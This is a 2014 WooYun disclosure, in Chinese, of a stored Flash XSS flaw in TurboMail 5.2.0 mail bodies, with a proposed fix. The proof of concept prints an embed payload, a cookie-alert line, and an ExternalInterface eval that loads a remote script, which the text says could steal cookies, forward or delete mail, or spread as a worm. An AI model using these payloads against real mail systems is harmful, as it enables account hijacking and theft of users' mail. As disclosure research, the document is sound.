[公开漏洞]Turbomail邮件系统正文持久型XSS漏洞

来源：WooYun　浏览：522次　时间：2014-06-12

Turbomail邮件系统正文持久型XSS漏洞相关厂商： Turbomail 漏洞作者：路人甲提交时间：2014-05-30 15:25 公开时间：2014-06-04 15:25 漏洞类型：xss跨站脚本攻击危害等级：中自评Rank：15 漏洞状态：已交由第三方厂商(cncert国家互联网应急中心)处理漏洞来源：http://www.wooyun.org Tags标签：存储型xss 漏洞详情披露状态：

2014-05-30：细节已通知厂商并且等待厂商处理中
2014-06-04：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

邮件系统对邮件内容过滤不严格，导致存储型跨站。

详细说明：

1、TurboMail邮件系统对邮件内容过滤不严格，导致存储型FLASH跨站，打开邮件即可触发漏洞，由于FLASH文件可以执行javascript代码，所以我们可以利用此漏洞进行盗取用户信息、用户邮件、钓鱼、修改用户设置、转发邮件等操作。

涉及版本v5.2.0

漏洞证明：

TurboMail下载地址：http://www.turbomail.org/download.html

测试浏览器：Firefox29.0.1、Chrome33.0.1750.149 m

1、写邮件，使用代理对请求进行拦截，本次使用burp suite，修改htmlbody字段值(即邮件内容)，如下图所示：

嵌入的恶意代码解码后的内容为：

<embed allowscriptaccess="always" width="0%" height="0%" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shock-wave-flash" src="http://127.0.0.1/xss.swf"></embed>

xss.swf内的脚本代码为：getURL("javascript:alert(document.cookie)");

2、用户打开邮件，漏洞触发：

3、使用Firebug查看页面源代码：

flash文件成功插入，且允许执行脚本代码

4、修改xss.swf文件内容，

import flash.external.ExternalInterface;

ExternalInterface.call("eval","d=document;e=d.createElement('script');e.src='http://127.0.0.1/eXploit.js';d.body.appendChild(e);");//使用ExternalInterface.call()函数加载本地脚本文件，通过修改本地脚本文件内容我们可以进行盗取用户信息、用户邮件、钓鱼，编写蠕虫等操作。

通过修改eXploit.js文件内容，我们可以进行盗取cookie，转发邮件、删除用户邮件等操作。

修复方案：

修改allowscriptaccess的值，禁止其执行脚本代码

危害等级：无影响厂商忽略

忽略时间：2014-05-30 15:25

厂商回复：